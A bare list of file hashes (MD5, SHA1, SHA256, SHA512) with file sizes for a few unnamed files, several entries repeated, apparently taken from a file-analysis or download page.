MD5 f5c51e7760315ad0f0238d268c03c60e
SHA1 85ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256 ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512 d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Filesize 3.7MB
MD5 f5c51e7760315ad0f0238d268c03c60e
SHA1 85ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256 ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512 d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Filesize 1.4MB
MD5 b6bbab9f72c88d07b484cc339c475e75
SHA1 f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256 dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Filesize 1.4MB
MD5 b6bbab9f72c88d07b484cc339c475e75
SHA1 f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256 dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Filesize 477KB
MD5 3753f9966e5b4fdc87184c1749f2bd25
SHA1 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756
SHA256 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299
SHA512 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6

Filesize 477KB
MD5 3753f9966e5b4fdc87184c1749f2bd25
SHA1 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756
SHA256 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299
SHA512 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6

Filesize 1.4MB
MD5 b6bbab9f72c88d07b484cc339c475e75
SHA1 f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256 dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Filesize 1.4MB
MD5 b6bbab9f72c88d07b484cc339c475e75
SHA1 f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256 dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA512 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Filesize 2KB
MD5 4ac8a26e2cee1347880edccb47ab30ea
SHA1 a629f6d453014c9dccb98987e1f4b0a3d4bdd460
SHA256 de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
SHA512 fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a